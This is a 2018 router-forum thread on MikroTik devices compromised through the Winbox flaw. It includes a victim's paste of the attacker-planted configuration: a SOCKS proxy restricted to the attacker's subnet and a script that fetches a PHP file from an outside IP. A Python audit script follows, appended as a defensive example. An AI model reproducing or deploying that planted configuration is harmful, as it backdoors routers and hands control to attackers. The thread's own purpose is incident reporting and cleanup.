 
saburtwo
just joined
Topic Author
Posts: 17
Joined: Sun Aug 05, 2018 11:55 pm

Mikrotik The Hack Continues following Winbox attack STP attack?

Mon Aug 06, 2018 12:18 am

Hi,
So we have around 1000 routers in our network and we were hacked around a week ago due to the Winbox password flaw.
We found the source addresses of some of the attackers and botnets, so we blocked those.
A few customers were offline for the last ROS upgrade and unfortunately they got hacked.

I have here on the bench a hacked rb951 which I have been trying to access all weekend.
Winbox, telnet and ssh are blocked.
So I decided to spoof the attackers' IPs and use the same exploit they did to get the password. No luck so far, so I must have missed their address and just got the bots.

My concern is this:
A few days ago, after the attack, we went to activate our new BGP only to realise the port was sending out STP, even though the port is not in a bridge; it is totally isolated.
Here I have the hacked rb951 and it too is sending out lots of STP from its WAN.
I just checked my own router with a similar config, which I netinstalled just yesterday, and there is no STP on the WAN, only the bridge as you would expect.

Has anybody else witnessed this?
 
fkchong
just joined
Posts: 1
Joined: Thu Sep 13, 2018 10:16 am

Re: Mikrotik The Hack Continues following Winbox attack STP attack?

Thu Sep 13, 2018 10:39 am

I also have this issue; the password was changed by someone, a "hacker".
I checked back in my last database and something has been added to my MikroTik:

/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25

/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no"

And I also have these critical login failures:

aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:08 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:09 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox


Everything in red is not my setting on the MikroTik router, but was added to the router automatically.
I also don't know about this IP address...
 
normis
MikroTik Support
Posts: 26381
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik The Hack Continues following Winbox attack STP attack?

Thu Sep 13, 2018 11:57 am

You have two choices

1) Netinstall with v6.43 and reconfigure it; this is the safe choice
2) Remove Scheduler rule, Scripts, SOCKS config and fix the firewall rules that the attackers have changed. CHANGE YOUR PASSWORD also.
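
An added example (not part of the thread and not MikroTik's own code): a Python check that scans the text of a RouterOS `/export` for the items named in the reply above, namely SOCKS config, scripts and scheduler entries. The sample export is constructed from the settings quoted earlier in the thread; the scheduler and `/ip address` lines and the names `parse_export` and `audit` are assumptions for illustration.

```python
import re

# Constructed sample: SOCKS and script lines are the ones quoted in the thread;
# the scheduler and /ip address lines are made up to complete the picture.
SAMPLE_EXPORT = r'''/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
/system scheduler
add interval=30s name=schedule4_ on-event=script4_
/ip address
add address=192.168.88.1/24 interface=bridge
'''

def parse_export(text):
    """Yield (menu, command) pairs from RouterOS export text."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join backslash-continued lines
    menu = ""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            # Either a bare menu ("/ip socks") or menu plus command on one line.
            m = re.match(r"(/.*?)(?:\s+((?:add|set)\b.*))?$", line)
            menu, cmd = m.group(1), m.group(2)
            if cmd:
                yield menu, cmd
        else:
            yield menu, line

def audit(text):
    """Return (kind, command) findings that an operator should review."""
    findings = []
    for menu, cmd in parse_export(text):
        if menu == "/ip socks" and re.search(r"\benabled=yes\b", cmd):
            findings.append(("socks-enabled", cmd))
        elif menu == "/ip socks access" and cmd.startswith("add"):
            findings.append(("socks-access-rule", cmd))
        elif menu == "/system script" and cmd.startswith("add"):
            kind = "script-with-fetch" if "/tool fetch" in cmd else "script"
            findings.append((kind, cmd))
        elif menu == "/system scheduler" and cmd.startswith("add"):
            findings.append(("scheduler-entry", cmd))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE_EXPORT), sep="\n")
```

The output is a review list, not a verdict: scripts and scheduler entries you created yourself are listed too. Changed firewall rules cannot be spotted this way and need a comparison against a known-good export.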
